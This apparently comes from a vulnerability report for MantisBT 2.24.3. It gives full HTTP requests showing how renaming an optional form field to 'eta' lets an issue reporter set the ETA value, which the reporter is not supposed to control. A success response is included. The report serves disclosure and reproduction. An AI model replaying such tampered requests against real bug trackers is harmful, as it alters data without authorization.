| Steps To Reproduce |
Plain request
POST /mantisbt-2.24.3/bug_report.php?posted=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------28360790916925231732680966577
Content-Length: 2510
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt-2.24.3/bug_report_page.php
Cookie: MANTIS_collapse_settings=|reported:0; MANTIS_secure_session=1; PHPSESSID=efcjp3n8q806abi5uiu7ut9nsn; MANTIS_STRING_COOKIE=pl4_WkLG8sIExzmWIYgL7c09BJ5CczC1k0mXiJCbVNnqxHc6lBg9IHNuqXnSla_9; MANTIS_PROJECT_COOKIE=3
Upgrade-Insecure-Requests: 1
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="bug_report_token"
202010014vOW1qEAHwxes_vYndpfweieM3YOFd_l
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="m_id"
0
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="project_id"
3
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="category_id"
1
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="reproducibility"
70
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="severity"
50
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="priority"
30
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="platform"
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="os"
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="os_build"
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="product_version"
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="build"
test issue no eta
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="summary"
test issue no eta
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="description"
test issue no eta
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="steps_to_reproduce"
test issue no eta
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="additional_info"
test issue no eta
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="tag_string"
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="tag_select"
0
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="max_file_size"
5000000
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="view_state"
10
-----------------------------28360790916925231732680966577--
- select any non-required field, in my case I select the
os field, rename it with eta and set a value of 20
Exploit request
POST /mantisbt-2.24.3/bug_report.php?posted=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------28360790916925231732680966577
Content-Length: 2510
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt-2.24.3/bug_report_page.php
Cookie: MANTIS_collapse_settings=|reported:0; MANTIS_secure_session=1; PHPSESSID=efcjp3n8q806abi5uiu7ut9nsn; MANTIS_STRING_COOKIE=pl4_WkLG8sIExzmWIYgL7c09BJ5CczC1k0mXiJCbVNnqxHc6lBg9IHNuqXnSla_9; MANTIS_PROJECT_COOKIE=3
Upgrade-Insecure-Requests: 1
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="bug_report_token"
202010014vOW1qEAHwxes_vYndpfweieM3YOFd_l
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="m_id"
0
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="project_id"
3
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="category_id"
1
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="reproducibility"
70
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="severity"
50
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="priority"
30
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="platform"
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="eta"
20
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="os_build"
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="product_version"
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="build"
test issue no eta
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="summary"
test issue no eta
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="description"
test issue no eta
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="steps_to_reproduce"
test issue no eta
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="additional_info"
test issue no eta
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="tag_string"
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="tag_select"
0
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="max_file_size"
5000000
-----------------------------28360790916925231732680966577
Content-Disposition: form-data; name="view_state"
10
-----------------------------28360790916925231732680966577--
Exploit response (I just select the success part)
<div class="btn-group">view.php?id=14view_all_bug_page.php</div>
- refresh the site and the
ETA field will render < 1 day
|
|---|
